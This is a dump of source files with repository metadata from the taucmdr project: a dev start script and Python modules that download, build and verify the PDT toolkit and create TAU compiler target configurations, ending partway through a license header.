"alphanum_fraction": 0.6098901033401489, "avg_line_length": 19.11111068725586, "blob_id": "e561dd29b1e5ad76654fa21a41b8a8fee2557a01", "content_id": "dcaec20fb4b9e113e5acce5edab27ca6089f737e", "detected_licenses": [ "BSD-2-Clause", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 182, "license_type": "permissive", "max_line_length": 54, "num_lines": 9, "path": "/commander/bin/dev_start.sh", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "#!/bin/bash\nHERE=$( cd \"$( dirname \"${BASH_SOURCE[0]}\" )\" && pwd )\n\ncd \"$HERE/..\"\nexport PATH=$PWD/node_modules/.bin:$PATH\n\nexport NODE_ENV=\"development\"\n#rm -rf .tmp\nsails lift $@\n\n" }, { "alpha_fraction": 0.5865488052368164, "alphanum_fraction": 0.5915661454200745, "avg_line_length": 33.28278732299805, "blob_id": "57c53ea4fd9430b3149b10bb1947cc69d90fbd46", "content_id": "0a1cabd199a6ead6d4f824e172314ce73c8a8ba0", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8371, "license_type": "permissive", "max_line_length": 108, "num_lines": 244, "path": "/packages/tau/cf/pdt.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport os\nimport sys\nimport shutil\nimport platform\n\n# TAU modules\nimport cf\nimport logger\nimport util\nimport error\nimport environment\n\n\nLOGGER = logger.getLogger(__name__)\n\nDEFAULT_SOURCE = {None: 'http://tau.uoregon.edu/pdt.tgz',\n # Why isn't this called pdt-x86_64.tgz ?? 
\"lite\" tells me nothing\n 'x86_64': 'http://tau.uoregon.edu/pdt_lite.tgz'}\n\nCOMMANDS = {None: ['cparse',\n 'cxxparse',\n 'edg33-upcparse',\n 'edg44-c-roseparse',\n 'edg44-cxx-roseparse',\n 'edg44-upcparse',\n 'edgcpfe',\n 'f90fe',\n 'f90parse',\n 'f95parse',\n 'gfparse',\n 'pdbcomment',\n 'pdbconv',\n 'pdbhtml',\n 'pdbmerge',\n 'pdbstmt',\n 'pdbtree',\n 'pdtf90disp',\n 'pdtflint',\n 'pebil.static',\n 'roseparse',\n 'smaqao',\n 'taucpdisp',\n 'tau_instrumentor',\n 'upcparse',\n 'xmlgen'],\n 'apple': ['cparse',\n 'cxxparse',\n 'edgcpfe',\n 'f90fe',\n 'f90parse',\n 'f95parse',\n 'gfparse',\n 'pdbcomment',\n 'pdbconv',\n 'pdbhtml',\n 'pdbmerge',\n 'pdbstmt',\n 'pdbtree',\n 'pdtf90disp',\n 'pdtflint',\n 'tau_instrumentor',\n 'taucpdisp',\n 'xmlgen'] \n}\n\n\nclass Pdt(object):\n \"\"\"\n Encapsulates a PDT installation\n \"\"\"\n def __init__(self, prefix, cxx, src, arch):\n self.src = src\n if src.lower() == 'download':\n try:\n self.src = DEFAULT_SOURCE[arch]\n except KeyError:\n self.src = DEFAULT_SOURCE[None]\n self.prefix = prefix\n self.cxx = cxx\n self.arch = arch\n if os.path.isdir(src):\n self.pdt_prefix = src\n else:\n compiler_prefix = str(cxx.eid) if cxx else 'unknown'\n self.pdt_prefix = os.path.join(prefix, 'pdt', compiler_prefix)\n self.src_prefix = os.path.join(prefix, 'src')\n self.include_path = os.path.join(self.pdt_prefix, 'include')\n self.arch_path = os.path.join(self.pdt_prefix, arch)\n self.bin_path = os.path.join(self.arch_path, 'bin')\n self.lib_path = os.path.join(self.arch_path, 'lib')\n\n def verify(self):\n \"\"\"\n Returns true if if there is a working PDT installation at `prefix` with a\n directory named `arch` containing `bin` and `lib` directories or \n raises a ConfigurationError describing why that installation is broken.\n \"\"\"\n LOGGER.debug(\"Checking PDT installation at '%s' targeting arch '%s'\" % (self.pdt_prefix, self.arch)) \n if not os.path.exists(self.pdt_prefix):\n raise error.ConfigurationError(\"'%s' does not exist\" % self.pdt_prefix)\n \n # Check for all commands\n try:\n commands = COMMANDS[self.arch]\n LOGGER.debug(\"Checking %s PDT commands\")\n except KeyError:\n commands = COMMANDS[None]\n LOGGER.debug(\"Checking default PDT commands\")\n for cmd in commands:\n path = os.path.join(self.bin_path, cmd)\n if not os.path.exists(path):\n raise error.ConfigurationError(\"'%s' is missing\" % path)\n if not os.access(path, os.X_OK):\n raise error.ConfigurationError(\"'%s' exists but is not executable\" % path)\n \n LOGGER.debug(\"PDT installation at '%s' is valid\" % self.pdt_prefix)\n return True\n\n def install(self, force_reinstall=False):\n \"\"\"\n TODO: Docs\n \"\"\"\n LOGGER.debug(\"Initializing PDT at '%s' from '%s' with arch=%s\" % \n (self.pdt_prefix, self.src, self.arch))\n \n # Check if the installation is already initialized\n if not force_reinstall:\n try:\n return self.verify()\n except error.ConfigurationError, err:\n LOGGER.debug(err)\n LOGGER.info('Starting PDT installation')\n\n # Download, unpack, or copy PDT source code\n dst = os.path.join(self.src_prefix, os.path.basename(self.src))\n try:\n util.download(self.src, dst)\n srcdir = util.extract(dst, self.src_prefix)\n except IOError as err:\n raise error.ConfigurationError(\"Cannot acquire source file '%s': %s\" % (self.src, err),\n \"Check that the file is accessable\")\n finally:\n try: os.remove(dst)\n except: pass\n\n if not self.cxx:\n compiler_flag = ''\n else:\n family_flags = {'system': '',\n 'GNU': '-GNU',\n 'Intel': '-icpc',\n 'PGI': '-pgCC'}\n try:\n 
compiler_flag = family_flags[self.cxx['family']]\n except KeyError:\n LOGGER.warning(\"PDT has no compiler flag for '%s'. Using defaults.\" % self.cxx['family'])\n compiler_flag = '' # Fall back to PDT's default configuration as the warning promises\n\n try:\n # Configure\n prefix_flag = '-prefix=%s' % self.pdt_prefix\n cmd = ['./configure', prefix_flag, compiler_flag]\n LOGGER.info(\"Configuring PDT...\")\n if util.createSubprocess(cmd, cwd=srcdir, stdout=False):\n raise error.SoftwarePackageError('PDT configure failed')\n\n # Build\n cmd = ['make', '-j4']\n LOGGER.info(\"Compiling PDT...\")\n if util.createSubprocess(cmd, cwd=srcdir, stdout=False):\n raise error.SoftwarePackageError('PDT compilation failed.')\n\n # Install\n cmd = ['make', 'install']\n LOGGER.info(\"Installing PDT...\")\n if util.createSubprocess(cmd, cwd=srcdir, stdout=False):\n raise error.SoftwarePackageError('PDT installation failed.')\n except:\n LOGGER.info(\"PDT installation failed, cleaning up\")\n shutil.rmtree(self.pdt_prefix, ignore_errors=True)\n finally:\n # Always clean up PDT source\n LOGGER.debug('Deleting %r' % srcdir)\n shutil.rmtree(srcdir, ignore_errors=True)\n \n # Verify the new installation\n try:\n retval = self.verify()\n LOGGER.info('PDT installation complete')\n except Exception as err:\n # Installation failed, clean up any failed install files\n #shutil.rmtree(self.pdt_prefix, ignore_errors=True)\n raise error.SoftwarePackageError('PDT installation failed: %s' % err)\n else:\n return retval\n\n def applyCompiletimeConfig(self, opts, env):\n \"\"\"\n TODO: Docs\n \"\"\"\n env['PATH'] = os.pathsep.join([self.bin_path, env.get('PATH')])\n\n def getRuntimeConfig(self, opts, env):\n \"\"\"\n TODO: Docs\n \"\"\"\n pass\n\n \n" }, { "alpha_fraction": 0.6622037291526794, "alphanum_fraction": 0.6640504598617554, "avg_line_length": 36.560691833496094, "blob_id": "c4be259f09ee4c2fab4c612fe93cddd99b9eaa9a", "content_id": "617f3a9265a7c1776248fee2fcb8eccdee00ca65", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6498, "license_type": "permissive", "max_line_length": 110, "num_lines": 173, "path": "/packages/tau/commands/target/create.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# TAU modules\nimport logger\nimport commands\nimport controller\nimport error\nimport arguments as args\nfrom model.target import Target\nfrom model.compiler import Compiler, KNOWN_FAMILIES\n\nLOGGER = logger.getLogger(__name__)\n\nSHORT_DESCRIPTION = \"Create a new target configuration.\"\n\nCOMMAND = ' '.join(['tau'] + (__name__.split('.')[1:]))\n\nUSAGE = \"\"\"\n %(command)s <target_name> [arguments]\n\"\"\" % {'command': COMMAND}\n\nHELP = \"\"\"\n'%(command)s' page to be written.\n\"\"\" % {'command': COMMAND}\n\nPARSER = args.getParserFromModel(Target,\n prog=COMMAND,\n usage=USAGE, \n description=SHORT_DESCRIPTION)\ngroup = PARSER.getGroup('compiler arguments')\ngroup.add_argument('--compilers',\n help=\"Select all compilers automatically from the given family\",\n metavar='<family>', \n dest='family',\n default=args.SUPPRESS,\n choices=KNOWN_FAMILIES.keys())\n\n\ndef getUsage():\n return PARSER.format_help() \n\n\ndef getHelp():\n return HELP\n\n\ndef main(argv):\n \"\"\"\n Program entry point\n \"\"\"\n args = PARSER.parse_args(args=argv)\n LOGGER.debug('Arguments: %s' % args)\n \n try:\n family = KNOWN_FAMILIES[args.family]\n except AttributeError:\n # --compilers not specified but that's OK\n pass\n except KeyError:\n raise error.ConfigurationError(\"Invalid compiler family: %s\" % args.family,\n \"See 'compiler arguments' under `tau target create --help`\")\n else:\n LOGGER.debug(\"Using %s compilers by default\" % args.family)\n for comp_info in family:\n setattr(args, comp_info.role, comp_info.command)\n del args.family\n LOGGER.debug('Arguments: %s' % args)\n\n languages = {'CC': 'C', 'CXX': 'C++', 'FC': 'Fortran'}\n compiler_keys = set(languages.keys())\n all_keys = set(args.__dict__.keys())\n given_keys = compiler_keys & all_keys\n missing_keys = compiler_keys - given_keys\n compilers = {}\n \n LOGGER.debug(\"Given keys: %s\" % given_keys)\n LOGGER.debug(\"Missing keys: %s\" % missing_keys) \n \n if not missing_keys:\n LOGGER.debug(\"All compilers specified by user\")\n for key in compiler_keys:\n compilers[key] = Compiler.identify(getattr(args, key))\n elif not given_keys:\n LOGGER.debug(\"No compilers specified by user, using defaults\")\n for key in compiler_keys:\n comp = Compiler.identify(getattr(args, key))\n LOGGER.info(\"%s compiler not specified, using default: %s\" % \n (comp['language'], comp.absolutePath()))\n compilers[key] = comp\n else:\n LOGGER.debug(\"Some compilers specified by user, using compiler family defaults\")\n siblings = set()\n for key in given_keys:\n comp = Compiler.identify(getattr(args, key))\n siblings |= set(Compiler.getSiblings(comp))\n compilers[key] = comp\n for key in missing_keys:\n for comp in siblings:\n if comp['role'] == key:\n LOGGER.info(\"%s compiler not specified, using default: %s\" % \n (comp['language'], comp.absolutePath()))\n compilers[key] = comp\n\n # Check that all compilers were found\n for key in compiler_keys:\n if key not in compilers:\n raise error.ConfigurationError(\"%s compiler 
could not be found\" % languages[key], \n \"See 'compiler arguments' under `tau target create --help`\")\n \n # Check that all compilers are from the same compiler family \n # This is a TAU requirement. When this is fixed in TAU we can remove this check\n families = list(set([comp['family'] for comp in compilers.itervalues()]))\n if len(families) != 1:\n raise error.ConfigurationError(\"Compilers from different families specified\",\n \"TAU requires all compilers to be from the same family, e.g. GNU or Intel\")\n LOGGER.info(\"Using %s compilers\" % families[0])\n \n # Check that each compiler is in the right role\n for role, comp in compilers.iteritems():\n if comp['role'] != role:\n raise error.ConfigurationError(\"'%s' specified as %s compiler but it is a %s compiler\" % \n (comp.absolutePath(), languages[role], comp['language']),\n \"See 'compiler arguments' under `tau target create --help`\")\n \n # Show compilers to user\n for comp in compilers.itervalues():\n LOGGER.info(\" %s compiler: '%s'\" % (comp['language'], comp.absolutePath()))\n \n flags = dict(args.__dict__)\n for key, comp in compilers.iteritems():\n flags[key] = comp.eid\n try:\n Target.create(flags)\n except controller.UniqueAttributeError:\n PARSER.error('A target named %r already exists' % args.name) \n\n LOGGER.info('Created a new target named %r.' % args.name)\n return commands.executeCommand(['target', 'list'], [args.name])\n" }, { "alpha_fraction": 0.6360206007957458, "alphanum_fraction": 0.6368188261985779, "avg_line_length": 36.04570007324219, "blob_id": "82f4d88555de432d50f9da73bed1fa7f88fd49e8", "content_id": "f9636bac4191c291b760a1b50da92ddcf727e6e7", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13781, "license_type": "permissive", "max_line_length": 119, "num_lines": 372, "path": "/packages/tau/cf/scorep.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport os\nimport sys\nimport shutil\nimport platform\nimport subprocess\n\n# TAU modules\nimport cf\nimport logger\nimport util\nimport error\nimport environment as env\n\n\nLOGGER = logger.getLogger(__name__)\n\nDEFAULT_SOURCE = 'http://tau.uoregon.edu/pdt.tgz'\n\ndef _detectDefaultHostOS():\n \"\"\"\n Detect the default host operating system\n \"\"\"\n return platform.system()\nDEFAULT_HOST_OS = _detectDefaultHostOS()\n\n\ndef _detectDefaultHostArch():\n \"\"\"\n Use PDT's archfind script to detect the host target architecture\n \"\"\"\n here = os.path.dirname(os.path.realpath(__file__))\n cmd = os.path.join(os.path.dirname(here), 'util', 'archfind', 'archfind')\n return subprocess.check_output(cmd).strip()\nDEFAULT_HOST_ARCH = _detectDefaultHostArch()\n\n\n#def _detectDefaultDeviceArch():\n# \"\"\"\n# Detect coprocessors\n# \"\"\"\n# return None\n#DEFAULT_DEVICE_ARCH = _detectDefaultDeviceArch()\n\ndef _getFortranConfigureFlag(compiler):\n if compiler.family != 'MPI':\n family_map = {'GNU': 'gfortran',\n 'Intel': 'intel'}\n try:\n return family_map[compiler.family]\n except KeyError:\n raise error.InternalError(\"Unknown compiler family for Fortran: '%s'\" % compiler.family)\n else:\n # TODO: Recognize family from MPI compiler\n raise error.InternalError(\"Unknown compiler family for Fortran: '%s'\" % compiler.family)\n\ndef verifyInstallation(prefix, arch, cc=None, cxx=None, fortran=None):\n \"\"\"\n Returns True if there is a working PDT installation at 'prefix' or raises\n an error.ConfigurationError describing why that installation is broken.\n \"\"\"\n LOGGER.debug(\"Checking PDT installation at '%s' targeting arch '%s'\" % (prefix, arch))\n \n if not os.path.exists(prefix):\n raise error.ConfigurationError(\"'%s' does not exist\" % prefix)\n bin = os.path.join(prefix, arch, 'bin')\n lib = os.path.join(prefix, arch, 'lib')\n\n # Check for all commands\n# for cmd in COMMANDS:\n# path = os.path.join(bin, cmd)\n# if not os.path.exists(path):\n# raise error.ConfigurationError(\"'%s' is missing\" % path)\n# if not os.access(path, os.X_OK):\n# raise error.ConfigurationError(\"'%s' exists but is not executable\" % path)\n# \n# # Check that there is at least one makefile\n# makefile = os.path.join(prefix, 'include', 'Makefile')\n# if not os.path.exists(makefile):\n# raise error.ConfigurationError(\"'%s' does not exist\" % makefile)\n# \n# # Check for the minimal config 'vanilla' makefile\n# makefile = os.path.join(lib, 'Makefile.tau')\n# if not os.path.exists(makefile):\n# LOGGER.warning(\"TAU installation at '%s' does not have a minimal Makefile.tau.\" % prefix)\n#\n# taudb_prefix = os.path.join(os.path.expanduser('~'), '.ParaProf')\n# LOGGER.debug(\"Checking tauDB installation at '%s'\" % taudb_prefix)\n# \n# if not os.path.exists(taudb_prefix):\n# raise error.ConfigurationError(\"'%s' does not exist\" % taudb_prefix)\n#\n# path = os.path.join(taudb_prefix, 'perfdmf.cfg')\n# if not os.path.exists(path):\n# raise error.ConfigurationError(\"'%s' does 
not exist\" % path)\n#\n# LOGGER.debug(\"tauDB installation at '%s' is valid\" % taudb_prefix)\n LOGGER.debug(\"PDT installation at '%s' is valid\" % prefix)\n return True\n\n\ndef initialize(prefix, src, force_reinitialize=False, \n arch=None, \n compiler_cmd=None):\n \"\"\"\n TODO: Docs\n \"\"\"\n pdt_prefix = os.path.join(prefix, 'pdt')\n if not arch:\n arch = detectDefaultHostArch()\n LOGGER.debug(\"Initializing pdt at '%s' from '%s' with arch=%s\" % (pdt_prefix, src, arch))\n\n # Check compilers\n cc = None\n cxx = None\n fortran = None\n if compiler_cmd:\n family = cf.compiler.getFamily(compiler_cmd[0])\n for comp in family['CC']:\n if util.which(comp.command):\n cc = comp.command\n break\n if not cc:\n raise error.ConfigurationError(\"Cannot find C compiler command!\")\n LOGGER.debug('Found CC=%s' % cc)\n for comp in family['CXX']:\n if util.which(comp.command):\n cxx = comp.command\n break\n if not cxx:\n raise error.ConfigurationError(\"Cannot find C++ compiler command!\")\n LOGGER.debug('Found CXX=%s' % cxx)\n for comp in family['FC']:\n if util.which(comp.command):\n # pdt's configure script has a goofy way of specifying the fortran compiler\n fortran = _getFortranConfigureFlag(comp)\n LOGGER.debug('Found FC=%s' % fortran)\n \n # Check if the installation is already initialized\n try:\n verifyInstallation(pdt_prefix, arch=arch, cc=cc, cxx=cxx, fortran=fortran)\n except error.ConfigurationError, err:\n LOGGER.debug(\"Invalid installation: %s\" % err)\n pass\n else:\n if not force_reinitialize:\n return\n \n # Control build output\n with logger.logging_streams():\n \n # Download, unpack, or copy pdt source code\n if src.lower() == 'download':\n src = DEFAULT_SOURCE\n src_prefix = os.path.join(prefix, 'src')\n dst = os.path.join(src_prefix, os.path.basename(src))\n try:\n util.download(src, dst)\n srcdir = util.extract(dst, src_prefix)\n except IOError:\n raise error.ConfigurationError(\"Cannot acquire source file '%s'\" % src,\n \"Check that the file or directory is accessable\")\n finally:\n try: os.remove(dst)\n except: pass\n \n # Initialize installation with a minimal configuration\n prefix_flag = '-prefix=%s' % pdt_prefix\n arch_flag = '-arch=%s' % arch if arch else ''\n cmd = ['./configure', prefix_flag, arch_flag]\n LOGGER.debug('Creating configure subprocess in %r: %r' % (srcdir, cmd))\n LOGGER.info('Configuring PDT...\\n %s' % ' '.join(cmd))\n proc = subprocess.Popen(cmd, cwd=srcdir, stdout=sys.stdout, stderr=sys.stderr)\n if proc.wait():\n raise error.ConfigurationError('pdt configure failed')\n \n # Execute make\n cmd = ['make', '-j4', 'install']\n LOGGER.debug('Creating make subprocess in %r: %r' % (srcdir, cmd))\n LOGGER.info('Compiling PDT...\\n %s' % ' '.join(cmd))\n proc = subprocess.Popen(cmd, cwd=srcdir, stdout=sys.stdout, stderr=sys.stderr)\n if proc.wait():\n raise error.ConfigurationError('pdt compilation failed.')\n\n # Leave source, we'll probably need it again soon\n LOGGER.debug('Preserving %r for future use' % srcdir)\n \n# # Initialize tauDB with a minimal configuration\n# taudb_configure = os.path.join(tau_prefix, arch, 'bin', 'taudb_configure')\n# cmd = [taudb_configure, '--create-default']\n# LOGGER.debug('Creating subprocess: %r' % cmd)\n# LOGGER.info('Configuring tauDB...\\n %s' % ' '.join(cmd))\n# proc = subprocess.Popen(cmd, stdout=sys.stdout, stderr=sys.stderr)\n# if proc.wait():\n# raise error.ConfigurationError('tauDB configure failed.')\n\n # Add pdt to PATH\n env.PATH.append(os.path.join(pdt_prefix, arch, 'bin'))\n LOGGER.info('pdt configured 
successfully')\n\n\n\n## System modules\n#import os\n#import sys\n#import subprocess\n#import shutil\n#\n## TAU modules\n#from tau import getLogger\n#from util import download, extract\n#from pkgs import Package\n#from error import InternalError, PackageError, ConfigurationError\n#from registry import getRegistry\n#\n#LOGGER = logger.getLogger(__name__)\n#\n#\n#class PdtPackage(Package):\n# \"\"\"\n# Program Database Toolkit package\n# \"\"\"\n# \n# SOURCES = ['http://tau.uoregon.edu/pdt.tgz']\n#\n# def __init__(self, project):\n# super(PdtPackage, self).__init__(project)\n# self.system_prefix = os.path.join(getRegistry().system.prefix, \n# self.project.target_prefix, 'pdt')\n# self.user_prefix = os.path.join(getRegistry().user.prefix, \n# self.project.target_prefix, 'pdt')\n#\n# def install(self, stdout=sys.stdout, stderr=sys.stderr):\n# config = self.project.config\n# pdt = config['pdt']\n# if not pdt:\n# raise InternalError('Tried to install pdt when (not config[\"pdt\"])')\n#\n# for loc in [self.system_prefix, self.user_prefix]:\n# if os.path.isdir(loc):\n# LOGGER.info(\"Using PDT installation found at %s\" % loc)\n# self.prefix = loc\n# return\n# \n# # Try to install systemwide\n# if getRegistry().system.isWritable():\n# self.prefix = self.system_prefix\n# elif getRegistry().user.isWritable():\n# self.prefix = self.user_prefix\n# else:\n# raise ConfigurationError(\"User-level TAU installation at %r is not writable\" % self.user_prefix,\n# \"Check the file permissions and try again\") \n# LOGGER.info('Installing PDT at %r' % self.prefix)\n#\n# if pdt.lower() == 'download':\n# src = self.SOURCES\n# elif os.path.isdir(pdt):\n# LOGGER.debug('Assuming user-supplied PDT at %r is properly installed' % pdt)\n# return\n# elif os.path.isfile(pdt):\n# src = ['file://'+pdt]\n# LOGGER.debug('Will build PDT from user-specified file %r' % pdt)\n# else:\n# raise PackageError('Invalid PDT directory %r' % pdt, \n# 'Verify that the directory exists and that you have correct permissions to access it.')\n#\n# # Configure the source code for this configuration\n# srcdir = self._getSource(src, stdout, stderr)\n# cmd = self._getConfigureCommand()\n# LOGGER.debug('Creating configure subprocess in %r: %r' % (srcdir, cmd))\n# LOGGER.info('Configuring PDT...\\n%s' % ' '.join(cmd))\n# proc = subprocess.Popen(cmd, cwd=srcdir, stdout=stdout, stderr=stderr)\n# if proc.wait():\n# shutil.rmtree(self.prefix, ignore_errors=True)\n# raise PackageError('PDT configure failed.')\n# \n# # Execute make\n# cmd = ['make', '-j']\n# LOGGER.debug('Creating make subprocess in %r: %r' % (srcdir, cmd))\n# LOGGER.info('Compiling PDT...\\n%s' % ' '.join(cmd))\n# proc = subprocess.Popen(cmd, cwd=srcdir, stdout=stdout, stderr=stderr)\n# if proc.wait():\n# shutil.rmtree(self.prefix, ignore_errors=True)\n# raise PackageError('PDT compilation failed.')\n# \n# # Execute make install\n# cmd = ['make', 'install']\n# LOGGER.debug('Creating make subprocess in %r: %r' % (srcdir, cmd))\n# LOGGER.info('Installing PDT...\\n%s' % ' '.join(cmd))\n# proc = subprocess.Popen(cmd, cwd=srcdir, stdout=stdout, stderr=stderr)\n# if proc.wait():\n# shutil.rmtree(self.prefix, ignore_errors=True)\n# raise PackageError('PDT installation failed.')\n# \n# # Cleanup\n# LOGGER.debug('Recursively deleting %r' % srcdir)\n# shutil.rmtree(srcdir)\n# LOGGER.info('PDT installation complete.')\n# \n# def uninstall(self, stdout=sys.stdout, stderr=sys.stderr):\n# LOGGER.debug('Recursively deleting %r' % self.prefix)\n# shutil.rmtree(self.prefix)\n# LOGGER.info('PDT 
uninstalled.')\n#\n# def _getConfigureCommand(self):\n# \"\"\"\n# Returns the command that will configure PDT\n# \"\"\"\n# # TODO: Support other compilers\n# return ['./configure', '-GNU', '-prefix=%s' % self.prefix]\n#\n# def _getSource(self, sources, stdout, stderr):\n# \"\"\"\n# Downloads or copies PDT source code\n# \"\"\"\n# source_prefix = os.path.join(self.project.registry.prefix, 'src')\n# for src in sources:\n# dst = os.path.join(source_prefix, os.path.basename(src))\n# if src.startswith('http://') or src.startswith('ftp://'):\n# try:\n# download(src, dst, stdout, stderr)\n# except:\n# continue\n# elif src.startswith('file://'):\n# try:\n# shutil.copy(src, dst)\n# except:\n# continue\n# else:\n# raise InternalError(\"Don't know how to acquire source file %r\" % src)\n# src_path = extract(dst, source_prefix)\n# os.remove(dst)\n# return src_path\n# raise PackageError('Failed to get source code')\n#\n" }, { "alpha_fraction": 0.6562147736549377, "alphanum_fraction": 0.6620352864265442, "avg_line_length": 30.892215728759766, "blob_id": "792e2e23778c9476ea57e490b1ffe05b4469b68b", "content_id": "170b57e317d92a8cc0b75c24c7ef2e4062e59c89", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5326, "license_type": "permissive", "max_line_length": 103, "num_lines": 167, "path": "/packages/tau/commands/__init__.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief \n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. 
